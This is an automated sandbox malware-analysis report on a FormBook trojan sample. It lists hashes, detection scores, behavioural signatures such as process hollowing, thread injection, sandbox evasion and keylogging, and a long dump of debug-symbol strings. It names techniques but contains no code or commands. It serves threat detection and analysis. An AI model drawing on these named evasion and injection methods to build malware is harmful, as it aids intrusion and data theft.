Analysis Report SecuriteInfo.com.Trojan.Packed2.42783.14936.6333

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Packed2.42783.14936.6333 (renamed file extension from 6333 to exe)
Analysis ID: 344595
MD5: 25fcc01067cabbf5d1aa3a2f8b18ed50
SHA1: 9f45d2e8e415ab38f42e4edb9b503ce82fed2402
SHA256: ba4721d93c056ef1763667732344fdc82066d71f0003e18ad03f6d93307b82fe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack Malware Configuration Extractor: FormBook
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Virustotal: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.AddInProcess32.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Binary contains paths to debug symbols
Source: Binary string: Windows.Data.Activities.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: syncreg.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CapabilityAccessManagerClient.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.Search.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: authui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, mstsc.exe
Source: Binary string: HolographicExtensions.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000000.675621631.0000000000712000.00000002.00020000.sdmp, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: LanguageOverlayUtil.pdb}S source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SLC.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cscobj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdblR5 source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: SettingMonitor.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: StructuredQuery.pdbYS` source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: werconcpl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdbiS0 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.Schema.Shell.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: d3d10warp.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.ApplicationModel.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PeopleBand.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: grooveex.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: imapi2.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb6u source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: srchadmin.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb)Sp source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb| source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: wkscli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: WpnClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdbyS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shdocvw.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: twinapi.pdbg source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TileControl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: OneCoreCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PlayToDevice.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: msvcp110_win.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb1SX source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SndVolSSO.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowUI.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: 5.pdb2R source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AppXDeploymentClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb%jI source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows.pdb source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: InputSwitch.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: cflapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: DataExchange.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdbuj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Data.Activities.pdbaS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Bcp47mrm.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: usermgrcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: SettingMonitor.pdb:uT source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdbIS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: Windows.UI.Immersive.pdb5SD source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: prnfldr.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: nlaapi.pdb0t/ source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Networking.Connectivity.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: nsi.pdbRjz source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ActXPrxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mlang.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: pcacli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: combase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: sppc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: oleacc.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wevtapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: framedynos.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samcli.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: sspicli.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: UiaManager.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dsreg.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ActionCenter.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: msoshext.pdb0 source: WerFault.exe, 0000000A.00000003.747320665.000001EDC8062000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cscapi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: d3d11.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdbuS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: gdi32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: MobileNetworking.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: avrt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb{ source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: ShellCommonCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: smartscreenps.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: wmiclnt.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: WindowsInternal.ComposableShell.Experiences.Switcher.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: atlthunk.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: bthprops.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: linkinfo.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscinterop.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb0 source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: mscms.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: user32.pdb source: WerFault.exe, 0000000A.00000003.738993307.000001EDC6E48000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdbn source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Shell.pdbqS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: dxgi.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: IconCodecService.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dlnashext.pdbIj source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WLIDProv.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SettingSyncPolicy.pdbQSx source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: winsta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Security.Authentication.Web.Core.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowDataEngine.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WscApi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepository.pdb%St source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: davclnt.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: stobject.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AppResolver.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: dcomp.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: NPSM.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: audioses.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: twinui.appcore.pdbUSd source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: UxTheme.pdb0 source: WerFault.exe, 0000000A.00000003.731495333.000001EDC6EB3000.00000004.00000001.sdmp
Source: Binary string: sapi_onecore.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ninput.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: StartTileData.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: PortableDeviceTypes.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: LanguageOverlayUtil.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000A.00000003.740772791.000001EDC777B000.00000004.00000001.sdmp
Source: Binary string: netprofm.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: sxs.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: pnidui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Shell.Broker.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: win32u.pdb source: WerFault.exe, 0000000A.00000003.739016455.000001EDC6E52000.00000004.00000001.sdmp
Source: Binary string: ResourcePolicyClient.pdbMS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: MrmCoreR.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: thumbcache.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PhotoMetadataHandler.pdb]Sl source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000A.00000003.740856862.000001EDC6DF0000.00000004.00000001.sdmp
Source: Binary string: ExplorerFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: imm32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb!SH source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
